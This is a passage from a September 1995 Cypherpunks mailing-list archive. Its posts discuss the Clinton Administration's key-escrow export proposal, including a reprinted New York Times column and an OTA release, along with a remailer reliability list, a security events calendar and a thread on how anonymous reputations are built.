Many concerns focus on whether > government-approved, key-escrow encryption will become > mandatory for government agencies or the private sector, if > non-escrowed encryption will be banned, and/or if these > actions could be taken without legislation. Although the > Clinton Administration has stated that it has no plans to > make escrowed encryption mandatory, or to ban other forms of > encryption, OTA points out that, absent legislation, these > intentions are not binding. OTA concludes that escrowed- > encryption initiatives warrant congressional attention > because of the public funds that will be spent in deploying > them, and also because negative public perceptions of the > processes for developing and deploying encryption standards, > and of the standards themselves, may erode public confidence > and trust in government and the effectiveness of federal > leadership in promoting responsible use of information > safeguards. > > OTA is a nonpartisan analytical agency that serves the U.S. > Congress. Its purpose is to aid Congress with the complex > and often highly technical issues that increasingly affect > our society. > > ORDERING INFORMATION > > For copies of the 142-page background paper "Issue Update on > Information Security and Privacy in Network Environments" > for congressional use, please call (202) 224-9241. To order > copies for noncongressional use, call (202) 512-0132 (GPO's > main bookstore) or (202) 512-1800 and indicate stock number > 052-003-01416-5. Or send your check for $11.00 a copy or > provide your VISA or MasterCard number and expiration date > to Superintendent of Documents, P.O. Box 371954, Pittsburgh, > PA 15250-7974, [FAX (202) 512-2250]. Free 8-page summaries > are available electronically, and by calling (202) 224-8996. 
>
> ELECTRONIC ACCESS
>
> Readers can access this background paper electronically through OTA Online via the following standard Internet tools:
>
> WWW: http://www.ota.gov
>
> FTP: otabbs.ota.gov; login as anonymous, password is your e-mail address; publications are in the /pub directory
>
> Telnet: otabbs.ota.gov; login as public, password is public
>
> Additional features of OTA Online are available through client software with a graphical user interface for Microsoft Windows. This software is available free through the WWW home page or by contacting the OTA Telecommunications and Information Systems Office, (202) 228-6000, or email sysop at ota.gov. Direct questions or comments on Internet services by email to netsupport at ota.gov
>

From pfarrell at netcom.com Mon Sep 11 05:57:18 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Mon, 11 Sep 95 05:57:18 PDT
Subject: Media coverage of NIST Export meetings?
Message-ID: <32173.pfarrell@netcom.com>

Has anyone seen any media coverage of last week's meetings? I haven't seen anything in either the Washington Post or the Wall Street Journal. Nothing on radio or local TV either.

I don't expect much coverage, as Joe Sixpack has no knowledge of why he should be interested. But I expected at least a paragraph hidden somewhere inside. Perhaps I missed it.

Anyone else seen any???

Pat

Pat Farrell    Grad Student    http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage
#include

From grendel at netaxs.com Mon Sep 11 06:03:18 1995
From: grendel at netaxs.com (Michael Handler)
Date: Mon, 11 Sep 95 06:03:18 PDT
Subject: 64 bit crypto
In-Reply-To: <199509110157.SAA01073@hammerhead.com>
Message-ID:

On Sun, 10 Sep 1995, Thaddeus J. Beier wrote:

> Forgive a little bit of code...

Hey. It's C. That's what this mailing list is about, right? ;-)

> for(i = 0; i < 65536) { /* stir the pot a long time */

for (i = 0; i < 65536; i++) { /* stir the pot a long time */

Otherwise the loop will run a *long* time. Like infinity. :-)

--
Michael Handler
Philadelphia, PA
Cypherpunks: Civil Liberty Through Complex Mathematics
better living through cryptography

From bianco at itribe.net Mon Sep 11 06:05:20 1995
From: bianco at itribe.net (David J. Bianco)
Date: Mon, 11 Sep 95 06:05:20 PDT
Subject: Cryptography Technical Report Server: Bad URL
Message-ID: <199509111304.JAA04118@gatekeeper.itribe.net>

My previous post about the Cryptography Technical Report Server (CTRS) contained a bad URL, so some of you who tried to access it recently weren't able to find it. My apologies. The problem has been fixed, though, so CTRS can now *really* be found at or

We're upgrading our SPARC Webserver to a spiffy new Challenge-S, so not only should you now have no problem finding CTRS, but it should also respond pretty quickly.

--
==========================================================================
David J. Bianco                 | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                    |
Suite 1700, World Trade Center  | email:
Norfolk, VA 23510               | URL  : http://www.itribe.net/~bianco/

From jya at pipeline.com Mon Sep 11 06:17:00 1995
From: jya at pipeline.com (John Young)
Date: Mon, 11 Sep 95 06:17:00 PDT
Subject: NYT on GAK
Message-ID: <199509111316.JAA02859@pipe2.nyc.pipeline.com>

The New York Times, September 11, 1995, p. D7.

Technology / Peter H. Lewis On The Net.

Privacy for computers? Clinton sets the stage for a debate on data encryption.

In terms of its ability to raise the nation's blood pressure, the debate over data encryption has not yet reached the same levels as gun control. But last week the Clinton Administration appeared to set the stage for an equally divisive debate over the degree to which businesses and individuals have the right to keep secrets when using telephones, computers and other forms of electronic communications.
In two days of public hearings last week in Gaithersburg, Md., home of the National Institute of Standards and Technology, the Administration introduced its long-awaited proposals to relax restrictions on the export of cryptographic software. The Administration drew a line in the virtual sands of cyberspace, signaling that it is willing to permit Americans to put stronger cryptographic locks on their electronic data only if a spare key to those locks is made available on demand to law-enforcement agencies.

There looms the conflict. Although the debate is about export controls, the "export" issue is irrelevant in today's era of global electronic networks. Placing a common privacy program on an Internet computer in Austin, Tex., is effectively no different from sending a shrink-wrapped copy of the program to Moscow. The real issue is how much privacy the Government is willing to allow its own citizens, and the latest word from the Clinton Administration is that the right to electronic privacy, like the right to bear arms, is not absolute.

Cryptography is the science of secret writing. In this digital era, it applies not just to notes, but also to telephone calls, money transfers, bank and credit card records, electronic mail, faxes and other computer files.

The Clinton Administration's goal is to allow Americans to use the strongest possible cryptographic technology, while at the same time preserving the ability of law-enforcement agencies to perform court-authorized wiretaps as part of the effort to catch drug dealers, terrorists, child pornographers and other miscreants. In other words, it favors strong cryptography, but not too strong.

The strength of cryptographic software is measured by the length of the software key necessary to encode and decode a message. The longer the key, the harder it is for an unauthorized user to decipher the message.
In recent years, the Government has generally permitted Americans to export cryptographic software with key lengths up to 40 bits. Experts say that 40-bit keys are secure from casual snooping, but will fall quickly to a determined codebreaker.

Last week, after more than a year of intense analysis, the Government introduced what it said was the best possible compromise. Under the new policy, companies can export encryption algorithms using 64-bit keys, which are much more secure, but only if spare keys are given to "escrow agents" who would make them available to law-enforcement agents under standard legal procedures, similar to legal wiretaps authorized by a judge. Otherwise, the 40-bit limit continues to apply.

Such a "key escrow" scheme is anathema to many privacy advocates who fear Government abuses. The Government first proposed a key escrow system with its so-called Clipper Chip, a technology that failed to win acceptance even as a voluntary standard. The new scheme is somewhat more palatable than Clipper.

Key escrow is still unpopular with American computer and software companies, which say it prevents them from competing against foreign companies that have no similar constraints, and with many multinational corporations, which say it prevents them from working with foreign companies that do not especially care for the idea of Uncle Sam holding the keys to their data banks.

"If this was intended to be any sort of compromise, I don't think it achieved its end," said Whitfield Diffie, a Sun Microsystems engineer who attended the meetings. "I didn't see anybody who was enthusiastic."

Raymond G. Kammer, deputy director of N.I.S.T., suggested that the hearings last week were intended to elicit public comment, and that the Administration's final position on cryptographic policy was still under analysis. But the emergence of key escrow issues at the N.I.S.T. proceedings suggests that key escrow is emerging as a nonnegotiable demand by some factions of the Clinton Administration, especially the Justice Department and the Federal Bureau of Investigation, led by Louis Freeh.

"If this fails," said a figure familiar with the Administration's thinking on the proposed change in cryptographic policy, "it's going to lead to a very divisive debate. And the irony, for libertarians who oppose key escrow, is that if it fails, I am convinced that Louis Freeh cannot be true to his job without proposing domestic controls on data encryption."

"He's not going to give up without a fight, and neither is the Justice Department," said the figure, who spoke on the condition he not be identified.

Others say they do not think the Clinton Administration has yet arrived at a concrete position, even after more than a year of study and debate.

"I don't think it's a final offer," said John Gilmore, an engineer at Cygnus Support, a computer company in Mountain View, Calif. "It looks to me like a weak strawman, a first offer, a proposal to dance."

The question is whether American citizens and businesses have the patience to wait for the music to start. And the issue may be moot, anyway, because the Internet is no more controlled by the United States than is the United Nations.

"The Internet Architecture Board has specifically decided to ignore export controls in designing the security infrastructure for the next generation of Internet protocols," Mr. Gilmore said. "The Internet of 1998 will provide automatic, secure, and fully private communication, without key escrow, internationally."

In other words, the Internet community is already planning to jump over the new line in the sand drawn last week by the Administration. Cryptography that is stronger than the Government's proposed system will be built into the Internet by a dozen countries, and American companies and individuals would be foolish not to use it.
At that point, millions of Americans will come into direct conflict with Government policy, and the popular gun-control bumper sticker may be replaced by one that says "If cryptography is outlawed, only outlaws will have cryptography."

[End]

From ylo at cs.hut.fi Mon Sep 11 06:18:28 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Mon, 11 Sep 95 06:18:28 PDT
Subject: Voice Encryption
In-Reply-To: <199509110742.AAA17689@ix5.ix.netcom.com>
Message-ID: <199509111315.QAA27696@shadows.cs.hut.fi>

> A friend of mine recently told me that Phil Zimmerman was distributing
> a voice encryption program over the 'net. I dismissed his comment
> thinking he was probably

There are several packages referenced in the software section of http://www.cs.hut.fi/crypto. It also contains links to ftp sites outside the United States.

Tatu

From nobody at REPLAY.COM Mon Sep 11 06:40:40 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 11 Sep 95 06:40:40 PDT
Subject: Comp Sec Calendar
Message-ID: <199509111339.PAA09319@utopia.hacktic.nl>

>From URL: http://csrc.ncsl.nist.gov/events/eventcal.txt

Last update: 07/24/95

COMPUTER SECURITY EVENTS CALENDAR

This file contains a list of upcoming computer security events. The absence or inclusion of any particular event does not imply criticism or endorsement by the National Institute of Standards and Technology or the sysop. Because of the nature of this material and how it is obtained, it is impossible to include every event. If you know of computer security events that are not listed, please send the conference/course literature and requests to the following:

Computer Security Resource Clearinghouse (Events Calendar)
National Institute of Standards and Technology
Room A-216, Bldg. 225
Gaithersburg, MD 20899
webmaster at csrc.ncsl.nist.gov

[Snip sessions before 9/7]

DATE:     09/07/95
TITLE:    Information Warfare Conference (InfoWarCon) '95
LOCATION: Arlington, VA
SPONSOR:  National Computer Security Association (NCSA)
CONTACT:  National Computer Security Association
ADDRESS:  10 S. Courthouse Ave.
CITY_ST:  Carlisle, PA 17013
PHONE:    (717) 258-1816

DATE:     09/11/95
TITLE:    ASIS 41st Annual Seminar & Exhibits
LOCATION: New Orleans, LA
SPONSOR:  American Society for Industrial Security (ASIS)
CONTACT:  Society for Industrial Security
ADDRESS:  1655 North Fort Myer Dr., Suite 1200
CITY_ST:  Arlington, VA 22209
PHONE:    (703) 522-5800

DATE:     09/11/95 - 09/13/95
TITLE:    Exploring the Hostile Cyberspace
LOCATION: Cleveland, OH
SPONSOR:  NASA Lewis Research Center, et al.
CONTACT:  New Dimensions International
ADDRESS:  P. O. Box 897
CITY_ST:  Cardiff, CA 92007
PHONE:    (619) 436-5618

DATE:     09/12/95
TITLE:    COSAC '95
LOCATION: Dublin, Ireland
SPONSOR:  Republic of Ireland AKA Associates
CONTACT:  AKA Associates
ADDRESS:  7 Darragh Road
CITY_ST:  Crossgar, Co. Down, BT30 9NP
E-MAIL:   cosac95 at ibm.net

DATE:     09/14/95
TITLE:    Network Security (LAN's Client/Server and the Internet)
LOCATION: St. Louis, MO (other dates and locations available, call CSI)
SPONSOR:  CSI (Computer Security Institute)
CONTACT:  CSI
ADDRESS:  600 Harrison Street
CITY_ST:  San Francisco, CA 94107
PHONE:    (415) 905-2626

DATE:     09/17/95
TITLE:    LISA 9th Systems Administration Conference
LOCATION: Monterey, California
SPONSOR:  USENIX, ACSTPA, SAGE
CONTACT:  USENIX Conference Office
ADDRESS:  22672 Lambert Street, Suite 613
CITY_ST:  Lake Forest, CA 92630
PHONE:    (714) 588-8649

DATE:     09/18/95
TITLE:    7th Computer Security Incident Handling Workshop
LOCATION: Karlsruhe, Germany
SPONSOR:
CONTACT:  Rechenzentrum Uni Karlsruhe, Herr Fischer
ADDRESS:  Zirkel 2
CITY_ST:  D-76131 Karlsruhe, Germany
PHONE:    +49 721 376422

DATE:     9/20/95
TITLE:    Acquisition Streamlining and Information Warfare
LOCATION: Koran Room, Ft. Myer Officers Club in Arlington, VA
SPONSOR:
CONTACT:
ADDRESS:
CITY_ST:  Arlington, VA
PRESENTER: Anthony Valletta, Deputy Assistant Secretary of Defense, C3I - Acquisitions
PHONE:    (202) 828-1920 for info or reservations

DATE:     10/10/95
TITLE:    18th National Information Systems Security Conference
LOCATION: Baltimore, MD
SPONSOR:  NSA/NCSC and NIST/CSL
CONTACT:  Tammie Grice
ADDRESS:  NIST, Room A807, Bldg 101
CITY_ST:  Gaithersburg, MD 20899
PHONE:    (301) 975-3883

DATE:     10/19-20/95
LOCATION: Bethesda, MD
SPONSOR:  ABA, NIST, USCIB, ...
CONTACT:  Worldwide Electronic Commerce Conference '95
ADDRESS:  PO Box 743485
CITY_ST:  Dallas, TX 75374
PHONE:    214.516.4900
EMAIL:    wec at multicorp.com
URL:      http://www.multicorp.com/wec

DATE:     10/24/95
TITLE:    The Business Recover Managers Symposium
LOCATION: San Diego, CA
SPONSOR:  MIS Training Institute
CONTACT:
ADDRESS:  498 Concord Street
CITY_ST:  Framingham, MA 01701-2357
PHONE:    (508) 879-7999

DATE:     11/06/95
TITLE:    CSI's 22nd Annual Computer Security Conference
LOCATION: Washington, D.C.
SPONSOR:  Computer Security Institute
CONTACT:  Computer Security Institute
ADDRESS:  600 Harrison St.
CITY_ST:  San Francisco, CA 94107
PHONE:    (415) 905-2626

DATE:     12/11/95
TITLE:    11th Annual Computer Security Applications Conference
LOCATION: New Orleans, LA
SPONSOR:  Applied Computer Security Associates
CONTACT:  Ann Marmor-Squires
ADDRESS:  TRW Systems Division
CITY_ST:  Fairfax, VA 22033
PHONE:    (703) 803-5503

DATE:     05/15/97
TITLE:    Security and Audit Oracle
LOCATION: Washington, D.C.
SPONSOR:  MIS & Dept. of Justice
CONTACT:  Pat Ciuffreda
ADDRESS:  CTTS/IRM/JMD, Room 1211-ARB
CITY_ST:  Washington, DC 20530
PHONE:    (202) 616-2018

From raph at CS.Berkeley.EDU Mon Sep 11 06:50:45 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 11 Sep 95 06:50:45 PDT
Subject: List of reliable remailers
Message-ID: <199509111350.GAA28685@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.
To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.taylored.com

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"ideath"} = " cpunk hash ksub reord";
$remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = " cpunk pgp hash filter";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = " cpunk pgp hash cut reord mix post";
$remailer{"ford"} = " cpunk pgp hash ksub";
$remailer{"hroller"} = " cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = " cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = " cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = " cpunk hash mix";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = " cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = " mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = " cpunk";
$remailer{"precip"} = " cpunk mix pgp hash latent cut ek";

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too.

Note: penet is *down* for a few days. Check back here for updates.
Last ping: Mon 11 Sep 95 4:00:27 PDT

remailer  email address                       history       latency  uptime
-----------------------------------------------------------------------
alumni    hal at alumni.caltech.edu            *--****+**+*      9:23  99.99%
hacktic   remailer at utopia.hacktic.nl       *****+****+*     12:51  99.99%
hroller   hroller at c2.org                    **********+*      7:48  99.99%
syrinx    syrinx at c2.org                     ------++-++*   1:16:52  99.99%
c2        remail at c2.org                     +++++++++++*     39:22  99.99%
flame     remailer at flame.alias.net         ++++++*-+*+*   1:20:26  99.99%
spook     remailer at spook.alias.net         --.--+-----    3:55:18  99.99%
bsu-cs    nowhere at bsu-cs.bsu.edu           ***-******+*     13:02  99.98%
replay    remailer at replay.com              *****+****+*     15:04  99.93%
ideath    remailer at ideath.goldenbear.com   ----.---+---   3:51:00  99.83%
ncognito  ncognito at gate.net                * ** ****++*      7:04  99.08%
rmadillo  remailer at armadillo.com           ++ + *+++*++     54:25  99.06%
precip    mixmaster at mix.precipice.com                      52:55  99.07%
ford      remailer at bi-node.zerberus.de     **********+*      5:54  98.82%
crown     mixmaster at kether.alias.net       -- ---+--+--   3:32:46  98.04%
extropia  remail at extropia.wimsey.com       _---.- -..-   12:48:37  97.01%
portal    hfinney at shell.portal.com         **** *+ *+*       5:57  96.81%
vishnu    mixmaster at vishnu.alias.net       ---------+*    4:59:22  96.27%
robo      robo at c2.org                       **********+*     11:03  95.95%
rahul     homer at rahul.net                   +*+*******+*      6:52  99.99%
gondolin  mixmaster at gondolin.org           -- . -+*--.    6:29:14  89.70%
mix       mixmaster at remail.obscura.com     ---+---___.   15:25:37  87.63%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

History key
    #  response in less than 5 minutes.
    *  response in less than 1 hour.
    +  response in less than 4 hours.
    -  response in less than 24 hours.
    .  response in more than 1 day.
    _  response came back too late (more than 2 days).

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.
special  Accepts only pgp encrypted messages.
mix      Can accept messages in Mixmaster format.
reord    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon      Remailer has been known to monitor contents of private email.
filter   Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From rah at shipwright.com Mon Sep 11 07:12:59 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 11 Sep 95 07:12:59 PDT
Subject: e$: Progress and Freedom Conference this Summer
Message-ID:

There was a pointer here to an article in the NYT or WSJ about the conference this summer of the Progress and Freedom Foundation, with muchos net.luminarios (Huber, Myhrvold, Barlow, Brand, Kelly, Dyson, Keyworth, etc.) in attendance. Topics were mostly about e$ and the causes/consequences thereof.

I just saw this thing on CSPAN, and I thought it was way cool. Here's how to get it from CSPAN in case they don't run it again.

Ask for Tape number 57759-63

CSPAN prices their tapes by the hour, at $35/hr.
This tape is $105.00

CSPAN
Department 53
Washington, DC 20055

In case I botched something above, or you want to put this on your favorite book-entry transaction account ;-), CSPAN's phone number is 202-737-3220 and ask for Viewer's Services.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From reagle at rpcp.mit.edu Mon Sep 11 07:13:08 1995
From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Mon, 11 Sep 95 07:13:08 PDT
Subject: question about reputation
Message-ID: <9509111414.AA29512@rpcp.mit.edu>

At 03:32 PM 9/10/95 -0700, Wei Dai wrote:
>For example, Alice starts an anonymous consulting service, and announces
>that she will answer the first ten queries for free. Upon hearing this,
>Mallet immediately starts another consulting service, and announces the
>same offer. At this point Mallet can simply forward his customers'
>queries to Alice and Alice's answers back to his customers. Thus, he gains
>reputation at no cost.

As a response to this example, I'd argue Mallet has less of a reputation because:

(1) if this example applies to the first 10 questions from each person, Alice will answer many more questions than Mallet. (Mallet answers 10 and is done.)

(2) if this example means the first 10 questions from anywhere, Mallet then has to arrange to have his customers' 10 questions in the queue and ready to go before any other person can get in the queue, which is some work.

In general, I'd think reputation is akin to brand name to a degree. Differentiation! So, if Alice notices people tracking her "reputation advertising" she can change it. Reputation might not be as static a concept as we think (as others have mentioned by bringing up arbitrage.)

-------------------------
Regards,
Joseph M. Reagle Jr.
http://farnsworth.mit.edu/~reagle/home.html
reagle at mit.edu
0C 69 D4 E8 F2 70 24 33 B4 5E 5E EC 35 E6 FB 88

From sdw at lig.net Mon Sep 11 07:42:06 1995
From: sdw at lig.net (Stephen D. Williams)
Date: Mon, 11 Sep 95 07:42:06 PDT
Subject: Clinton's Black Helicopters Over My House!
In-Reply-To:
Message-ID:

> > ObConspiracy content: high.
> > They are coming to take me away, take me away!
> > Clinton's black helicopters are swooping low over my house.
> > What should I do?
...
> --Tim May
>
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May | Crypto Anarchy: encryption, digital money,
> tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA | knowledge, reputations, information markets,
> Higher Power: 2^756839 | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."

About a month ago I walked by California Pizza Kitchen just south of Dupont circle and Clinton was there eating with his family in a full restaurant... Too bad I didn't have my RSA T-shirt yet...

BTW, I sent money ages ago. My 'Cypherpunk Criminal' shirt is just about worn out.

sdw
--
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95

From jim at rand.org Mon Sep 11 08:27:50 1995
From: jim at rand.org (Jim Gillogly)
Date: Mon, 11 Sep 95 08:27:50 PDT
Subject: Clipper: the definitive meme
Message-ID: <199509111526.IAA17504@mycroft.rand.org>

T-shirt!! T-shirt!!

Jim Gillogly
Trewesday, 20 Halimath S.R. 1995, 15:26

------- Forwarded Message

From: wtshaw at aol.com (WTShaw)
Newsgroups: talk.politics.crypto
Subject: Re: Impressions of the NIST meeting
Date: 11 Sep 1995 04:50:27 -0400

In the world of Jet-Age crypto, the government offers up a biplane, and seeks to reserve the second seat for themselves.

------- End of Forwarded Message

From lwp at mail.msen.com Mon Sep 11 09:10:34 1995
From: lwp at mail.msen.com (Lou Poppler)
Date: Mon, 11 Sep 95 09:10:34 PDT
Subject: Brian Davis' cypherpunk GAK proposal
In-Reply-To:
Message-ID:

On Sun, 3 Sep 1995 21:25:26 -0400 (EDT), Brian Davis wrote:
}
} I, of course, know of the "dislike" of GAK here. I am curious to know,
} however, if the "dislike" is because government would have access under
} any circumstances or if the primary worry is that government will cheat
} and get access when most would agree that they shouldn't (either by the
} judge "cheating" or a TLA stealing it).

You leave out something here when you say `the judge "cheating"'. Most of the proposals and draft legislation include words like "or by other lawful authority" along with the provisions empowering judges to grant access to keys. Some versions will list various combinations of the Attorney General, Director of {TLA}, etc, as explicitly empowered. Other versions don't explicate the phrase, perhaps trusting that those with the need will already know where their lawful authority lies -- maybe in an anti-terrorist Executive Order; maybe in legislation authorizing military support in drug interdiction; perhaps in their organization's charter to protect "national security".

Part of the concern is that spooks will have routine access to keys without any cheating -- no stealing or bent judges will be required. The War on Drugs, the War on Firearms, the War on Terrorists (on Money Launderers, on Pedophiles, on Spies) are just too important.

} In other words ... if it took agreement by a review board composed of
} non-LEA members of this list, would the escrow be acceptable??

This would not be acceptable to the government. Very many sincere, patriotic government agents believe they currently have the right and the responsibility to monitor the civilians' possibly-illegal activities. Your hypothetical review board of cypherpunks would unacceptably limit their established right to gather evidence and intelligence. Investigations too sensitive to mention here would be crippled. Unless of course, you intended that "or by other lawful authority" would be included in your scheme?

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: Lou Poppler                  | "Understanding is a three-edged         ::
:: http://www.msen.com/~lwp/    | sword..."-- Ambassador Kosh, Babylon5  ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From jya at pipeline.com Mon Sep 11 09:13:23 1995
From: jya at pipeline.com (John Young)
Date: Mon, 11 Sep 95 09:13:23 PDT
Subject: VER_tgo
Message-ID: <199509111613.MAA02185@pipe1.nyc.pipeline.com>

9-11-95. W$Japer:

"VeriFone Expected to Announce System For Purchasing Goods on the Internet."

VeriFone, Inc., which manufactures terminals through which merchants scan consumers' credit cards for authorization, said it will provide merchants who wish to market goods on the global computer network with a complete set of tools to handle electronic cash, electronic checks and credit-card payments. The system consists of four different products: A consumer would use the software equivalent of a wallet, which could include different forms of payment, such as electronic checks, cash, or credit cards to purchase goods. The consumer would also use a smartcard inserted in a device connected to a PC to verify his identity. The card would also contain other cardholder information and eventually could include electronic cash.
"Philips and Oracle Plan Electronic Mail Without Use of PCs"

Philips Electronics NV and Oracle Corp. plan to offer electronic mail without personal computers, using Philips phones that have small display screens and keyboards. Gerrit Schipper, president of Philips Home Services, said the new e-mail service was designed to increase the services' value and appeal to the 70% of U.S. households that don't have PCs.

2 go: VER_tgo (5 kb)

From tcmay at got.net Mon Sep 11 09:44:42 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 11 Sep 95 09:44:42 PDT
Subject: question about reputation
Message-ID:

How reputation systems work is an important issue. I hope we can discuss it further.

At 10:32 PM 9/10/95, Wei Dai wrote:
>In an economy based on positive reputations, how does one acquire a
>reputation capital? One way may be to initially perform services at a
>price below cost, but this has some problems.
>
>For example, Alice starts an anonymous consulting service, and announces
>that she will answer the first ten queries for free. Upon hearing this,
>Mallet immediately starts another consulting service, and announces the
>same offer. At this point Mallet can simply forward his customers'
>queries to Alice and Alice's answers back to his customers. Thus, he gains
>reputation at no cost.
>
>On the other hand, this "man-in-the-middle" attack can also work against
>conventional True Name based services, but perhaps with less effect. Has
>anyone ever heard of this being done?

This line of reasoning is a variant of the "Chess Grandmaster" scheme, wherein one gains the reputation of a chess grandmaster by echoing the moves of a chess grandmaster playing in another game. I believe this is described in various crypto books, but I haven't looked it up here.

In practice, nothing so simple as an "Ask any 10 questions" would be a practical way to gain reputation.
If Alice is trying to build up a rep, she'll choose her customers with some care, or make sure that alternate channels also exist.

>Is there a better way to acquire a good reputation?

Directly contacting a larger group, such as this list, is usually a faster and better way to build a reputation than in, say, answering only questions directly made. Admittedly, many consulting cases involve direct contacts. However, the reputation of a Pr0duct Cypher, or a Black Unicorn, or a Tim May, or a Wei Dai, is usually made in a public forum, not primarily in one-on-one contacts. While not all of us sign our posts, the principle is roughly the same: we are communicating directly, so man-in-the-middle attacks, or "Chess Grandmaster" attacks, are fairly ineffective. And practically speaking, if someone hires _me_ as a consultant, it is probably based on past achievements, through multiple channels. This would apply to digital pseudonyms as well, though not as directly.

(Humorous Sidenote: an informal variant of the Chess Grandmaster approach is to use the best arguments found on one list on _another_ list. Another variant, widely used, is to adopt the best arguments of others and use them one's self (oneself?). This is how memes spread, and is central to the advancement of knowledge.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From clewton at netcom.com Mon Sep 11 09:53:47 1995 From: clewton at netcom.com (Charles Lewton) Date: Mon, 11 Sep 95 09:53:47 PDT Subject: e$: Progress and Freedom Conference this Summer In-Reply-To: Message-ID: On Mon, 11 Sep 1995, Robert Hettinga wrote: > > I just saw this thing on CSPAN, and I thought it was way cool. Here's how > to get it from CSPAN in case they don't run it again. > > Cheers, > Bob Hettinga During the program, which was *very* interesting, it was announced by CSPAN that they would carry the remainder of the meeting next Sunday Sept. 17. Check w/them for the time locally. Chuck Lewton Redmond, WA From frissell at panix.com Mon Sep 11 09:58:16 1995 From: frissell at panix.com (Duncan Frissell) Date: Mon, 11 Sep 95 09:58:16 PDT Subject: NYT on GAK Message-ID: <199509111516.LAA11450@panix.com> > "If this fails," said a figure familiar with the > Administration's thinking on the proposed change in > cryptographic policy, "it's going to lead to a very > divisive debate. And the irony, for libertarians who oppose > key escrow, is that if it fails, I am convinced that Louis > Freeh cannot be true to his job without proposing domestic > controls on data encryption." > > "He's not going to give up without a fight, and neither is > the Justice Department," said the figure, who spoke on the > condition he not be identified. It worked during WWII but will it work now? After all, locking up Japanese Americans worked during WWII, but would not work now. Note that the NSA abandoned their "born secret" stance on cryptographic technology when it became impossible to sustain. And when R, S, & A together with MIT decided to publish "A Proposal for a Public Key Encryption System" in spite of NSA threats, the Agency folded. That represented a genuine surrender. We'll see if Louis has more balls than the NSA did. Widespread resistance is likely. Court tests will be entertaining. 
At this point in the discussion, someone always pipes up and says that even if cypherpunks fail to obey a crypto ban, businesses will fall into line like the good sheep they are. This prediction ignores some important facts about modern businesses.

